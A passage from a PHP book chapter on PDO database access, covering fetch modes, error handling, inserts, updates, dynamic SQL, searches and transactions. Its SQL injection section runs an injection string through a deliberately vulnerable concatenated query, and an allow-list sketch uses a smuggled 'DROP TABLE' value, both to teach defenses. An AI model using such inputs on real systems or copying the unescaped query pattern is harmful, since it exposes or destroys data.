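$stmt = $dbh->prepare('SELECT Name FROM city
    WHERE CountryCode = ? AND Name = ?');
$stmt->execute(array('GU', 'Guam'));
$positional = $stmt->fetchAll(PDO::FETCH_COLUMN);

print implode(', ', $named) . "\n";
print implode(', ', $positional) . "\n";
```

     Values passed to execute in this way are treated as strings; use bindParam or
     bindValue when you need to state a type such as PDO::PARAM_INT.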

     Using Fetch Choices
     When you use prepare and execute, you have the choice of a number of formats
     in which data can be returned. The example we saw used the PDO::FETCH_ASSOC
     option with the fetch method, because it returns data in a format that will be very
     familiar for PHP4 users: an associative array.7

     6
      For further information, see The PHP Manual page at
     http://www.php.net/manual/en/function.PDO-query.php.

If you’d rather use only object-oriented code in your application, you could instead
employ the fetchObject method, which, as the name implies, returns the result
set as an object. Here’s how the while loop will look when the fetchObject method
is used:

                                                                           pdoPrepEx2.php (excerpt)

    while ($row = $stmt->fetchObject())
    {
      print $row->Name . "\t";
      print $row->CountryCode . "\t";
      print $row->Population . "\n";
    }
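
To compare a few of the fetch choices side by side, here is a small sketch that reads
the same row three ways. It assumes an in-memory SQLite table in place of the world
database; the fetch constants themselves are standard PDO.

```php
<?php
// Assumption: an in-memory SQLite table stands in for the world database
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (ID INTEGER PRIMARY KEY, Name TEXT,
    CountryCode TEXT)');
$dbh->exec("INSERT INTO city (ID, Name, CountryCode)
    VALUES (1, 'Guam', 'GU')");

$stmt = $dbh->prepare('SELECT Name, CountryCode FROM city WHERE ID = :id');

// Associative array, keyed by column name
$stmt->execute(array(':id' => 1));
$assoc = $stmt->fetch(PDO::FETCH_ASSOC);

// Numerically indexed array, in column order
$stmt->execute(array(':id' => 1));
$num = $stmt->fetch(PDO::FETCH_NUM);

// Anonymous object, with one property per column
$stmt->execute(array(':id' => 1));
$obj = $stmt->fetch(PDO::FETCH_OBJ);

print $assoc['Name'] . "\t" . $num[0] . "\t" . $obj->Name . "\n";
```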




How do I resolve errors in my SQL queries?
Errors are inevitable. They assail all of us and can, at times, be caused by circumstances
outside our control: database crashes, database upgrades, downtime for
maintenance, and so on. If something goes wrong when you’re trying to deal with
PHP and SQL together, it’s often difficult to find the cause. The trick is to get PHP
to tell you where the problem is, bearing in mind that you must be able to hide this
information from visitors when the site goes live.


           We’re Only Looking for Errors—Not Fixing Them!
         I won’t be explaining error handling in depth here—instead, I’ll show you how
         to find errors. See Chapter 9 for more information on what to do when you’ve
         found an error and want to fix it.


Solutions
PDO provides multiple solutions for catching errors. We’ll go over all three options
in the following examples, where we’ll introduce a typo into the world database
table name, so that it reads cities instead of city. If you run this code yourself,
you can also try commenting out the error-handling code to see what may be displayed
to site visitors.

7
    For a full listing of the ways in which you can have data returned, see the fetch page of the manual
at http://www.php.net/manual/en/function.pdostatement-fetch.php.

     Using Silent Mode
     PDO::ERRMODE_SILENT was the default mode before PHP 8.0 (from PHP 8.0 onward, the
     default is PDO::ERRMODE_EXCEPTION):

                                                                  pdoError1.php (excerpt)

      $country = 'USA';
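      $dbh = new PDO($dsn, $user, $password);
      // Silent mode must be requested explicitly on PHP 8.0 and later
      $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_SILENT);
      $sql = 'Select * from cities where CountryCode =:country';
      $stmt = $dbh->prepare($sql);
      $stmt->bindParam(':country', $country, PDO::PARAM_STR);
      $stmt->execute();
      $code = $stmt->errorCode();
      // errorCode returns the SQLSTATE string '00000' when no error occurred
      if ($code === '00000')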
      {
        ⋮ proceed to fetch data
      }
      else
      {
        echo 'Error with the database: <br />';
        echo 'SQL Query: ', $sql;
        echo '<pre>';
        var_dump($stmt->errorInfo());
        echo '</pre>';
      }



     Silent mode records the error code on the PDOStatement object, where the errorCode
     method can read it, but does nothing else. As you can see in this example, you need
     to check the error code manually to ascertain whether or not an error was found;
     otherwise your script will happily continue on its merry way.

     Using Warning Mode
     PDO::ERRMODE_WARNING generates a PHP warning as well as setting the errorCode
     property:

                                                             pdoError2.php (excerpt)

 $country = 'USA';
 $dbh = new PDO($dsn, $user, $password);
 $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_WARNING);
 $sql = 'Select * from cities where CountryCode =:country';
 $stmt = $dbh->prepare($sql);
 $stmt->bindParam(':country', $country, PDO::PARAM_STR);
 $stmt->execute();
 $code = $stmt->errorCode();
 // errorCode returns the SQLSTATE string '00000' when no error occurred
 if ($code === '00000')
 {
   ⋮ proceed to fetch data
 }
 else
 {
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo '<pre>';
   var_dump($stmt->errorInfo());
   echo '</pre>';
 }



Again, the program will continue on its merry way unless you specifically check
for the error code. So, unless you have the Display Errors functionality turned on,
use a custom error handler, or check your error logs, you may not notice it.

Using Exception Mode
PDO::ERRMODE_EXCEPTION throws a PDOException as well as setting the errorCode
property:

                                                             pdoError3.php (excerpt)

 $country = 'USA';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
                      PDO::ERRMODE_EXCEPTION);
   $sql = 'Select * from cities where CountryCode =:country';
   $stmt = $dbh->prepare($sql);
   $stmt->bindParam(':country', $country, PDO::PARAM_STR);
   $stmt->execute();
   ⋮ proceed to fetch data
 }
 catch (PDOException $e)
 {
   echo 'PDO Exception Caught. ';
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo '<pre>';
   echo 'Error: ' . $e->getMessage() . '<br />';
   echo 'Code: ' . $e->getCode() . '<br />';
   echo 'File: ' . $e->getFile() . '<br />';
   echo 'Line: ' . $e->getLine() . '<br />';
   echo 'Trace: ' . $e->getTraceAsString();
   echo '</pre>';
 }




     PDO::ERRMODE_EXCEPTION allows you to wrap your code in a try {…} catch {…}
     block. An uncaught exception will halt the script and display a stack trace to let
     you know there’s a problem.

     PDOException extends RuntimeException, one of the exception classes in the
     Standard PHP Library (or SPL), which in turn extends PHP’s base Exception class.8

     Discussion
     Most people will choose to take advantage of PHP’s more powerful object-oriented
     model, and use the Exception mode to handle errors, since it follows the
     object-oriented style of error handling (catching and handling different types of
     exceptions) and is easier to work with.

     Regardless of the way you choose to handle your errors, it’s a good idea to return
     the text of the SQL query itself. This allows you to see exactly which query is
     problematic and will assist you in the error’s debugging.
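
     One way to keep the SQL text available for debugging while hiding it from visitors
     is to send the details to the error log and show only a generic message. The sketch
     below is an illustration, not part of the book's code archive: the $debug flag and
     the wording of the visitor message are hypothetical, and an in-memory SQLite
     database stands in for the world database.

```php
<?php
$debug = false; // hypothetical flag: set to true on a development machine only

// Define the SQL before the try block so the catch block can always report it
$sql = 'SELECT * FROM cities WHERE CountryCode = :country'; // deliberate typo
$shown = '';
try
{
  $dbh = new PDO('sqlite::memory:');
  $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
  $dbh->exec('CREATE TABLE city (ID INTEGER PRIMARY KEY, Name TEXT,
      CountryCode TEXT)');
  $stmt = $dbh->prepare($sql);
  $stmt->execute(array(':country' => 'USA'));
}
catch (PDOException $e)
{
  // The full details, including the SQL, go to the error log
  error_log('Database error: ' . $e->getMessage() . ' | SQL: ' . $sql);
  // Visitors see the details only when debugging is switched on
  $shown = $debug
      ? 'Error: ' . $e->getMessage() . ' SQL Query: ' . $sql
      : 'Sorry, something went wrong. Please try again later.';
  echo $shown, "\n";
}
```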




     8
         You can learn more about the SPL and PHP’s base Exception class in the manual, at
     http://www.php.net/spl/ and http://www.php.net/manual/en/language.exceptions.php.


How do I add data to, or modify
data in, my database?
Being able to fetch data from the database is a start, but how can you put it there in
the first place?

Solution
We add data to the database with the SQL INSERT command, and modify data that’s
already in the database with the SQL UPDATE command. Both commands can be
sent to the database using either the query method or the prepare and execute
methods. I’ll be using the prepare and execute methods in this solution.

INSERT Data into the Database
First up, let’s look at a simple INSERT, using the City table from the world database:

                                                                   insert.php (excerpt)

 $id = '4080';
 $name = 'Guam';
 $country = 'GU';
 $district = 'Guam';
 $population = 171018;
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'INSERT INTO city
       (ID, Name, CountryCode, District, Population)
       VALUES (:id, :name, :country, :district, :pop)';
   $stmt = $dbh->prepare($sql);
   $stmt->bindParam(':id', $id);
   $stmt->bindParam(':name', $name);
   $stmt->bindParam(':country', $country);
   $stmt->bindParam(':district', $district);
   $stmt->bindParam(':pop', $population);
   $stmt->execute();
 }
 catch (PDOException $e)
 {
   echo 'PDO Exception Caught. ';
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo 'Error: ' . $e->getMessage();
 }
 ?>




     UPDATE Data in the Database
     And here’s a simple UPDATE, using the City table from the world database:

                                                                   update.php (excerpt)

      $id = '4080';
      $name = 'Guam';
      $country = 'GU';
      $district = 'Guam';
      $population = 171019;     // data provided by the U.S. Census
                                // Bureau, International Data Base
                                // Mid year 2006
      try
      {
        $dbh = new PDO($dsn, $user, $password);
        $dbh->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
        $sql = 'UPDATE city SET Name = :name,
            CountryCode = :country, District = :district,
            Population = :pop WHERE ID = :id';
        $stmt = $dbh->prepare($sql);
        $stmt->bindParam(':id', $id);
        $stmt->bindParam(':name', $name);
        $stmt->bindParam(':country', $country);
        $stmt->bindParam(':district', $district);
        $stmt->bindParam(':pop', $population);
        $stmt->execute();
      }
      catch (PDOException $e)
      {
        echo 'PDO Exception Caught. ';
        echo 'Error with the database: <br />';
        echo 'SQL Query: ', $sql;
        echo 'Error: ' . $e->getMessage();
      }
      ?>


Discussion
Note that other than changing the SQL statement used in the prepare method, the
code in both examples above is exactly the same. We do like to keep things easy in
PHP!

In a practical application, some, if not all, of the inputs to the query will be garnered
from user-generated content. Because we’re using the prepare and execute methods,
we don’t have to worry about an SQL injection attack on this query: all the variables
will be escaped automatically.


       Be Cautious with UPDATE and DELETE
      Be very careful when you use UPDATE or DELETE in your SQL. If you don’t have
      a WHERE clause in your SQL statement, you will end up updating or deleting all
      the rows in the table. Needless to say, either outcome could cause serious problems!



How do I protect my web site
from an SQL injection attack?
An SQL injection attack occurs when an attacker exploits a legitimate user input
mechanism on your site to send SQL code that your unsuspecting script passes on
to the database for execution. The golden rule for avoiding SQL injection attacks
is: escape all data from external sources before letting it near your database. That
rule doesn’t just apply to INSERT and UPDATE queries, but also to SELECT queries.

As we discussed earlier, using prepared statements for all your queries within a
script almost eliminates the problem of SQL injection attacks, but if you choose to
use the query method, you’ll have no such protection: you’ll have to manually escape
any user input that goes into the query. Let’s look at an example:

                                                                       sqlInject.php (excerpt)

 //$city = 'New York';
 $city ="' or Name LIKE '%" ;
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = "Select * from city where Name ='". $city ."'";
   foreach ($dbh->query($sql) as $row)
   {
     print $row['Name'] . "\t";
     print $row['CountryCode'] . "\t";
     print $row['Population'] . "\n";
   }
 }
 catch (PDOException $e)
 {
   echo 'PDO Exception Caught. ';
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo 'Error: ' . $e->getMessage();
 }




     In this example, we’ll pretend that the $city variable used in the SQL statement
     comes from a form submitted by the user. A typical user would submit something
     like New York. This would give us the following SQL statement:

      Select * from city where Name ='New York'



     This would cause no problems within the script. A savvy attacker, however, may
     enter ' OR Name LIKE '%, which would give us the following SQL statement:

      Select * from city where Name ='' OR Name LIKE '%'



     This input opens the entire table to the attacker. “No big deal,” you say. “It’s only
     a list of cities.” Yes, but what if instead of our simple city table, this was the authorized
     users table? The attacker would have access to extremely sensitive data!

     Solution
     Luckily, this issue is fairly easy to avoid, though the solution will mean more work
     for you. You can use PDO’s handy quote method to escape any data that you’re
     passing to the SQL string. The quote method adds the surrounding quotes itself,
     so leave them out of the SQL code and change it to this:

       $sql = 'Select * from city where Name = ' . $dbh->quote($city);

Remember that you’ll need to quote each individual piece of data you use in the
SQL query—there aren’t any shortcuts! That is, unless you consider prepare and
execute a shortcut.


Discussion
If you’re using the PDO->query method, always quote your input. Always!

If you choose to use the prepare and execute approach, you won’t have to quote
the values that you bind to the prepared SQL (for example, the values to be inserted);
that’s all done for you by the driver. However, there may be times when you
won’t be able to bind a variable to the prepared SQL: parameters can stand in only
for values, not for a column name in a GROUP BY or ORDER BY clause, or for a table
name. The quote method won’t help with these either, because it produces a string
value rather than an identifier, so if you’re building a dynamic SQL statement, check
such input against a list of names you know to be valid.
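
Both defenses can be sketched in a few lines. The code below is an illustration under
stated assumptions: it uses an in-memory SQLite database with two sample rows in place
of the world database, and the $allowed list and $requested input are hypothetical
names introduced for the example.

```php
<?php
// Assumption: an in-memory SQLite table stands in for the world database
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (Name TEXT, CountryCode TEXT)');
$dbh->exec("INSERT INTO city (Name, CountryCode)
    VALUES ('New York', 'USA'), ('Guam', 'GU')");

$city = "' or Name LIKE '%"; // the hostile input from the example above

// Unquoted input: the attacker's text becomes part of the SQL
$unsafe = "SELECT * FROM city WHERE Name ='" . $city . "'";
$unsafeRows = $dbh->query($unsafe)->fetchAll(PDO::FETCH_ASSOC);

// Quoted input: quote() wraps the value in quotes and escapes the ones inside
$safe = 'SELECT * FROM city WHERE Name = ' . $dbh->quote($city);
$safeRows = $dbh->query($safe)->fetchAll(PDO::FETCH_ASSOC);

print count($unsafeRows) . " rows without quote\n";
print count($safeRows) . " rows with quote\n";

// Identifiers cannot be bound or quoted as values, so map the user's
// choice onto column names we know to be valid (hypothetical list)
$allowed = array('name' => 'Name', 'country' => 'CountryCode');
$requested = 'population; DROP TABLE city'; // hostile input
$orderBy = isset($allowed[$requested]) ? $allowed[$requested] : 'Name';
$sorted = $dbh->query('SELECT Name FROM city ORDER BY ' . $orderBy)
    ->fetchAll(PDO::FETCH_COLUMN);
```

The user never supplies the column name itself, only a key that selects one of the
names already written into the script.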

Remember: a strong defense is a good offense.


How do I create flexible SQL statements?
SQL is a powerful language for manipulating data. With PHP, we can construct SQL
statements out of variables—an approach that can be useful for sorting a table by a
single column, or displaying a large result set across multiple pages.

Solution
Until the SQL is prepared and executed, it’s still just a string that you can manipulate
as you’d expect. This solution uses concatenation based on user input to select cities
from the specified country and display them in a specified order:

                                                            flexSQLConcat.php (excerpt)

 $validCountries = array ('USA', 'CAN', 'GU', 'ISR');
 if (isset($_GET['country']) &&
     in_array($_GET['country'], $validCountries))
 {
     $country = $_GET['country'];
 }
 else
 {
     $country = 'USA';
 }
 $order = (!isset($_GET['order'])) ? FALSE : $_GET['order'];
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'SELECT * FROM city WHERE CountryCode = :country';
   switch ($order) {
     case 'district':
       // Add to the $sql string
       $sql .= " ORDER BY District";
       break;
     case 'pop':
       $sql .= " ORDER BY Population DESC";
       break;
     default:
       // Default sort by name
       $sql .= " ORDER BY Name";
       break;
   }
   $stmt = $dbh->prepare($sql);
   $stmt->bindParam(':country', $country);
   $stmt->execute();
   while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
     print $row['Name'] . "\t";
     print $row['CountryCode'] . "\t";
     print $row['Population'] . "\n";
   }
 }
 catch (Exception $e)
 {
   echo 'PDO Exception Caught. ';
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo 'Error: ' . $e->getMessage();
 }




     In this code, the user input is read either from a web form that has GET as its method,
     or a URL with a query string. In the switch statement above, we’re generating dynamic
     SQL using concatenation. The $order value is read, and an ORDER BY clause
     is added to the SQL query.


Discussion
An alternative solution involves using sprintf to build your dynamic SQL. This
approach is similar to binding variables to the prepared SQL:

                                                         flexSQLSprintf.php (excerpt)

   switch ($order) {
     case 'district':
       $orderby = " District";
       break;
     case 'pop':
       $orderby = " Population DESC";
       break;
     default:
       $orderby = " Name";
       break;
   }
   $format = 'SELECT * FROM city
       WHERE CountryCode = :country ORDER BY %s';
   $sql = sprintf($format, $orderby);



It’s a matter of personal style, but either of these approaches can be extended to
columns, table names, WHERE clauses, LIMIT clauses, and anything else you wish to
include in your SQL query.

Remember that until the point at which the SQL is prepared and executed, it’s just
a string that you can manipulate as much as you require.
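
The same idea extends to splitting a result set across pages. The sketch below binds
the page size and offset as integers; it assumes an in-memory SQLite database, a
handful of sample city names, and the LIMIT ... OFFSET syntax, which differs between
database systems. The $page and $perPage variables are hypothetical stand-ins for
validated user input.

```php
<?php
// Assumption: an in-memory SQLite table stands in for the world database
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (Name TEXT, CountryCode TEXT)');
$dbh->exec("INSERT INTO city (Name, CountryCode) VALUES
    ('New York', 'USA'), ('Los Angeles', 'USA'), ('Chicago', 'USA'),
    ('Houston', 'USA'), ('Phoenix', 'USA')");

$perPage = 2;
$page = 2;                    // would normally come from $_GET['page']
$page = max(1, (int) $page);  // never trust the raw value

$sql = 'SELECT Name FROM city WHERE CountryCode = :country
    ORDER BY Name LIMIT :limit OFFSET :offset';
$stmt = $dbh->prepare($sql);
$stmt->bindValue(':country', 'USA', PDO::PARAM_STR);
// Bind the numbers as integers so they are not sent as quoted strings
$stmt->bindValue(':limit', $perPage, PDO::PARAM_INT);
$stmt->bindValue(':offset', ($page - 1) * $perPage, PDO::PARAM_INT);
$stmt->execute();
$names = $stmt->fetchAll(PDO::FETCH_COLUMN);

print implode("\n", $names) . "\n";
```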


How do I find out how
many rows I’ve touched?
Often, it’s useful to be able to count the number of rows returned or affected by a
query before you do anything with them. This capability is particularly handy when
you’re splitting results across pages, or producing statistical information.

Solutions
The two solutions that follow will enable you to count the number of rows returned,
and the number of rows affected, by your operations within the database.

     Counting the Rows Returned
     PDO doesn’t have a magic method that counts the number of rows returned from a
     SELECT call. You can use the PDOStatement->rowCount method to return the number
     of rows returned by a SELECT statement with some PDO database drivers. However,
     as the behavior of this function isn’t guaranteed to be consistent with every database
     driver, I won’t cover it here. Feel free to try it yourself with your database driver,
     but keep in mind that if you need to write portable code, this approach is not reliable.
     There is, however, a solution that works around this lack of a useful method—it
     uses the SQL aggregate function COUNT.

     Here’s the code that will count the number of rows returned:

                                                                         count.php (excerpt)

      $country = 'USA';
      try
      {
        $dbh = new PDO($dsn, $user, $password);
        $dbh->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
        $sql = 'SELECT COUNT(*) FROM city
            WHERE CountryCode =:country';
        $stmt = $dbh->prepare($sql);
        $stmt->bindParam(':country', $country, PDO::PARAM_STR);
        $result = $stmt->execute();
        echo 'There are ', $stmt->fetchColumn(), ' rows returned.';
      }
      catch (PDOException $e)
      {
        echo 'PDO Exception Caught. ';
        echo 'Error with the database: <br />';
        echo 'SQL Query: ', $sql;
        echo 'Error: ' . $e->getMessage();
      }



     Discussion
     COUNT returns the number of rows from a query, or a part of a query, and is commonly
     used with the DISTINCT keyword. SQL’s aggregate function COUNT is widely supported
     by the various database systems. For more information on how your database
     handles COUNT, see your database’s documentation.
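
     As a brief sketch of COUNT used with DISTINCT, the query below counts both the
     cities and the distinct districts for one country code. The in-memory SQLite
     database and the three sample rows are assumptions made for illustration.

```php
<?php
// Assumption: an in-memory SQLite table stands in for the world database
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (Name TEXT, CountryCode TEXT, District TEXT)');
$dbh->exec("INSERT INTO city (Name, CountryCode, District) VALUES
    ('Guam', 'GU', 'Guam'), ('Dededo', 'GU', 'Guam'),
    ('New York', 'USA', 'New York')");

$sql = 'SELECT COUNT(*) AS cities,
    COUNT(DISTINCT District) AS districts
    FROM city WHERE CountryCode = :country';
$stmt = $dbh->prepare($sql);
$stmt->execute(array(':country' => 'GU'));
$row = $stmt->fetch(PDO::FETCH_ASSOC);

// Some drivers return numbers as strings, so cast before using them
$cities = (int) $row['cities'];
$districts = (int) $row['districts'];
echo "There are $cities cities in $districts district(s).\n";
```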

Counting the Rows Affected
We can use the PDOStatement->rowCount method to find out how many rows were
affected by an UPDATE, INSERT or DELETE query. The use of rowCount is not common
in typical PHP applications, but it can be a good way to inform users that “Number
of records deleted from the Customers table: n.”

Here’s the code you’ll need:

                                                                        affect.php (excerpt)

 $country = 'AFG';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'DELETE FROM city WHERE CountryCode = :country';
   $stmt = $dbh->prepare($sql);
   $stmt->bindParam(':country', $country, PDO::PARAM_STR);
   $result = $stmt->execute();
   echo 'Number of records deleted from the city table: ';
   echo $stmt->rowCount();
 }
 catch (PDOException $e)
 {
   echo 'PDO Exception Caught. ';
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo 'Error: ' . $e->getMessage();
 }



After you call PDOStatement->execute, you can call the PDOStatement->rowCount
method to return the number of rows affected.


       Make Sure You Add a WHERE Clause
     When you’re using the SQL commands UPDATE and DELETE, always make sure
     you add a WHERE clause. Without it, you will either be updating every row
     in the table, or deleting all the data in the table, neither of which is likely
     to be what you meant to do!


     How do I find out a new INSERT’s row
     number in an autoincrementing field?
     When you’re dealing with autoincrementing columns in database tables, you’ll often
     need to find out the ID of a row you’ve just inserted, so that you can update other
     tables with this information. After all, that’s how relationships between tables are
     maintained.

     Solution
     To accomplish this task, PDO provides the lastInsertId method, which returns
     the ID generated by the last INSERT operation if this capability is supported by the
     driver being used.9 Here’s how it works:

                                                                                 lastId.php (excerpt)

         $name = 'Dededo';
         $country = 'GU';
         $district = 'Guam';
         $population = 42980; // according to the 2000 US census
         try
         {
           $dbh = new PDO($dsn, $user, $password);
           $dbh->setAttribute(PDO::ATTR_ERRMODE,
               PDO::ERRMODE_EXCEPTION);
           $sql = 'INSERT INTO city
               (Name, CountryCode, District, Population)
               VALUES (:name, :country, :district, :pop)';
           $stmt = $dbh->prepare($sql);
           $stmt->bindParam(':name', $name);
           $stmt->bindParam(':country', $country);
           $stmt->bindParam(':district', $district);
           $stmt->bindParam(':pop', $population);
           $stmt->execute();
           echo 'ID of last insert: ', $dbh->lastInsertId();
         }
         catch (PDOException $e)
         {
           echo 'PDO Exception Caught. ';
           echo 'Error with the database: <br />';
           echo 'SQL Query: ', $sql;
           echo 'Error: ' . $e->getMessage();
         }

     9
         lastInsertId may not behave consistently when it’s used with different database drivers; some
     database drivers do not support autoincrementing fields. Read the manual page at
     http://www.php.net/manual/en/function.PDO-lastInsertId.php for more information.




Discussion
When you’re using the lastInsertId method, be sure to use the PDO object ($dbh
above), not the PDOStatement object (that’s the object you create when you use
prepare—$stmt above). If you don’t, an error will result.
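
Here is a sketch of the typical use: taking the new ID from the connection and storing
it in a related table. The city_note table is hypothetical, and an in-memory SQLite
database is assumed in place of the world database.

```php
<?php
// Assumption: in-memory SQLite tables; city_note is a hypothetical table
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (ID INTEGER PRIMARY KEY AUTOINCREMENT,
    Name TEXT, CountryCode TEXT)');
$dbh->exec('CREATE TABLE city_note (ID INTEGER PRIMARY KEY AUTOINCREMENT,
    CityID INTEGER, Note TEXT)');

$stmt = $dbh->prepare('INSERT INTO city (Name, CountryCode)
    VALUES (:name, :country)');
$stmt->execute(array(':name' => 'Dededo', ':country' => 'GU'));

// Ask the connection ($dbh), not the statement ($stmt), for the new ID
$cityId = $dbh->lastInsertId();

// Use the new ID to tie a row in another table to the city
$stmt = $dbh->prepare('INSERT INTO city_note (CityID, Note)
    VALUES (:city, :note)');
$stmt->execute(array(':city' => $cityId, ':note' => 'Largest village'));

$linked = $dbh->query('SELECT c.Name FROM city_note n
    JOIN city c ON c.ID = n.CityID')->fetchColumn();
echo 'Note attached to: ', $linked, "\n";
```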


How do I search my table?
Some people are just impatient; rather than exploring your site with the friendly
navigation system you’ve provided, they demand relevant information now! And
obliging PHP developers like you and me happily implement search functionality to
provide visitors with a shortcut to the information they want.

In the bad old days when all content was stored in the form of HTML files, developing
usable search functionality could be quite a problem, but now that we use
databases to store content, performing searches becomes much easier.

Solution
The most basic form of search occurs against a single column, with the database
LIKE operator:

                                                                  like.php (excerpt)

 $country = 'A';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'SELECT * FROM city
       WHERE CountryCode LIKE :country';
   $stmt = $dbh->prepare($sql);
   $country = $country.'%';
   $stmt->bindParam(':country', $country, PDO::PARAM_STR);
   $stmt->execute();
   while ($row = $stmt->fetchObject()) {
     print $row->Name . "\t";
     print $row->CountryCode . "\t";
     print $row->Population . "\n";
   }
 }
 catch (PDOException $e)
 {
   echo 'PDO Exception Caught. ';
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo 'Error: ' . $e->getMessage();
 }




     Discussion
     The LIKE search is supported by almost all database systems,10 and is usually used
     in conjunction with wildcard characters. The % character I used in the example
     above matches any number of characters, even zero characters. The wildcard
     character used in the example allows my query to find any city whose country
     code starts with the letter A.

     The other wildcard character that’s typically available is _, which will match any
     single character. So if, in the example above, I wanted to find only cities whose
     country codes consist of an A, any single character, and a G, I’d need to change
     just one line of code:

      /* $country = $country.'%';     <- remove this */

      $country = $country.'_G';   // <- add this



     If you need a more complicated search method, check your database documentation
     to see what’s available. For example, MySQL has FULLTEXT search capabilities, as
     explained on the MySQL manual site.11
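
     One detail worth sketching: if the search term comes from a user, any % or _ it
     contains will be treated as a wildcard unless you escape it. The escapeLike
     function below is a hypothetical helper, not part of PDO; the sketch assumes your
     database supports the ESCAPE clause, and uses an in-memory SQLite table with two
     made-up names to show the difference.

```php
<?php
// Hypothetical helper: prefix the LIKE wildcards (and the escape
// character itself) so they are matched literally
function escapeLike($term, $escape = '!')
{
  return str_replace(
      array($escape, '%', '_'),
      array($escape . $escape, $escape . '%', $escape . '_'),
      $term);
}

// Assumption: an in-memory SQLite table with made-up names
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE city (Name TEXT)');
$dbh->exec("INSERT INTO city (Name) VALUES ('A_B'), ('AxB')");

$term = 'A_'; // the user wants names that start with a literal "A_"
$stmt = $dbh->prepare("SELECT Name FROM city
    WHERE Name LIKE :term ESCAPE '!' ORDER BY Name");

// Escaped: the underscore is matched literally
$stmt->execute(array(':term' => escapeLike($term) . '%'));
$escaped = $stmt->fetchAll(PDO::FETCH_COLUMN);

// Unescaped: the underscore matches any single character
$stmt->execute(array(':term' => $term . '%'));
$unescaped = $stmt->fetchAll(PDO::FETCH_COLUMN);

print count($escaped) . ' match when escaped, '
    . count($unescaped) . " when not\n";
```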




     10
          You should verify the availability of the LIKE keyword, and the wildcard characters you want to use
     with it, in your database system documentation.
     11
          http://dev.mysql.com/doc/refman/5.0/en/fulltext-search.html


How do I work with transactions?
Let’s imagine we’re trying to complete a transaction at our local bank: we need to
move some money from our savings account to our checking account (to pay for
that vacation, of course). Now, if a problem arises in the middle of the transaction
(after we withdraw the money from the savings account, but before we deposit it
into the checking account), the money will disappear, and we can forget that vacation.
Or will it?

If you need to run a group of SQL queries as one operation in order to maintain the
integrity of your data, then you need transactions. Almost all databases provide
transaction support in one form or another, and knowing how to use transactions
with PDO can help you secure that well-deserved vacation.

Solution
We start the hypothetical transaction with the PDO->beginTransaction method,
and if all goes well, end it with PDO->commit. If a problem occurs, we use the
PDO->rollBack method to undo everything that’s taken place in the transaction:

                                                            transaction.php (excerpt)

 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $dbh->beginTransaction();
   $sql = 'INSERT INTO transactions
       (acctNo, type, value, adjustment)
       VALUES (:acctNo, :type, :value, :adjust)';
   $stmt = $dbh->prepare($sql);
   $stmt->execute(array(':acctNo'=>$acctFrom, ':type'=>$withdrawal,
       ':value'=>$amount, ':adjust'=>'-'));
   $sql = 'INSERT INTO transactions
       (acctNo, type, value, adjustment)
        VALUES (:acctNo, :type, :value, :adjust)';
   $stmt = $dbh->prepare($sql);
   $stmt->execute(array(':acctNo'=>$acctTo,
                         ':type'=>$deposit,
                         ':value'=>$amount,
                         ':adjust'=>'+'));
   $dbh->commit();
 }
 catch (Exception $e)
 {
   $dbh->rollBack();
   ⋮ further error handling here
 }




     Discussion
     Before we get into the deeper nuances of PDO’s transaction handling capabilities,
     let’s look at the official definition of database transactions from the PDO manual
     page12:

     “If you’ve never encountered transactions before, they offer 4 major features:
     Atomicity, Consistency, Isolation and Durability (ACID).13 In layman’s terms, any
     work carried out in a transaction, even if it is carried out in stages, is guaranteed to
     be applied to the database safely, and without interference from other connections,
     when it is committed. Transactional work can also be automatically undone at your
     request (provided you haven’t already committed it), which makes error handling
     in your scripts easier.”

     “Transactions are typically implemented by “saving-up” your batch of changes to
     be applied all at once; this has the nice side effect of drastically improving the efficiency
